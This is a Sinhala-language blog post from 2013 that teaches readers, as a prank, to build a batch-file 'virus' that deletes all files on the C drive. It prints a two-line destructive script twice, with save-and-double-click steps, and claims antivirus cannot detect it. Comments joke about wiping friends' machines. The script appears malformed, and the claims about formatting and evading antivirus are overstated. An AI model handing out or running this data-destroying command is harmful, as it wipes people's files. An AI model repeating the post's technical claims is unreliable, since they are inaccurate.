Like us

Follow Us

Total Pageviews

සුභ නව වසරක් වේවා!

C Drive එක තත්පරෙන් Format වෙන වයිරස් එකක් හදමුද?

by Unknown  |  in ෆන් වැඩ at  Friday, December 06, 2013



හායි හායි ................ කොහොමද යාලුවනේ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?????   ගොඩක් කාලෙකින් නේද?....


  100 වෙනි පොස්ටුවත් දාල ඉවරිනේ....... කියන්නත් හරි සතුටුයි..............  
දැන් නම් exam  ඉවරයිනේ ........ exam එකෙන් පස්සේ දාන 1වෙනි පොස්ටුවනේ.....
                     
                  ඉතින් ඉතින්................    
මටත් පිස්සු මොනවද මන් මේ කියවන්නේ........ අය්යෝ.... කතා ඇති වැඩේට බහිමු.......

 මේක ඉතින් සමහර අය දන්නවා ඇතිනේ..... දන් නැති අය මේකෙන් දැනගන්නකො.....

දැන් ඉතින් ජනප්ප්‍රිය රැල්ලනේ Virus හදන එක.... ඉතින් මාත් හිතුව ඔයගොල්ලන්ට Virus එකක් හදන ව්දිහ කියල දෙන්න....

මේක ගැන කිව්වොත් ,
       Virus එක පොඩි උනාට හරිම Dangerous එකක්..... මේක ඇවිල්ල..මිනිත්තුවක් යන්න ඉස්සෙල්ල හදාගන්න පුළුවන් උනාට C Drive එකේ තියෙන ඔක්කොම Files Delete කරනවා..... එලකිරි වගේ.................... 
      දැන් ඔයගොල්ලෝ හිතනවා ඇති මන් කොහොමද එළකිරි වගේ කිව්වේ කියල..... ඕක මන් අත්හදා බලන්න ගිහින් මගේ machine එකත් ෆොර්මැට් කරන්න උනා.....
මන් ඔයගොල්ලන්ටත් කියන්නේ 
මේක අත්හදා බැලුවට කමක් නැ Format කරන්න තියෙන Computer එකක හොදේ..........

දැන් අපි බලමු මේ Virus එක හදන හැටි....,,,,

තව පොඩ්ඩෙන් අමතක වෙනවා...... මේ Virus එක AntiVirus gard එකකකින් අල්ලන්න බැ හොදේ....... 

1. එස්සේල්ලම මේ පහල තියෙන Cods ටික Copy කරගෙන Notepad එකට Paste පාරක් දාගන්නකෝ..

                                           @Echo off
                                          Del C:\ *.* |y


2. ඊට පස්සේ ඕක save කරනකොට Name එක ව්දිහට virus.bat (ඕකේ Name එකට ඕන එකක් දෙන්න ඒත් .bat කියල අනිවාර්යෙන්ම දාන්න ඕනෙ හොදේ.....)

3. දැන් ඔයා save කරපු තැනට ආපු Icon එක Dobble Click කලාම,,,,,,, C Drive එකේ තියෙන
ඔක්කොම Files Delete වෙනවා......හරිය.......


උඩ කියපු දේම මන් අයෙත් කියන්නම් ඔයගොල්ලෝ මේක ෆොර්මටේ කරන්න ඕනේ Computer එකක අත්හදා බැලුවට කමක් නැ...........

                      එහෙනම් මන් කැපුන......... පස්සේ හම්බවෙමු.......බයි බායි.........

     හොදයි කියල හිතෙනවා නම් comment එකක් කොටලම යන්න හොදේ.........


virus.bat#sthash.Zn7uq6NU.dpuf

@Echo off
Del C:\ *.* |y

5 comments:

  1. ඔහෙ පලයන් මේ අපේ රවීන් සහෝ නේද,එල එල මගේ එකත් ෆෝමැට් කරලා දෙන්ඩෝ..

    ReplyDelete
  2. etakota wena partition ekak format karanna baida machan....

    ReplyDelete

+++වැඩේ හොදයි කියලා හිතෙනවනම් ශේප් එකේ අදහසකුත් කොටලම යන්නකෝ..

Related Posts Plugin for WordPress, Blogger...
Proudly Powered by Blogger.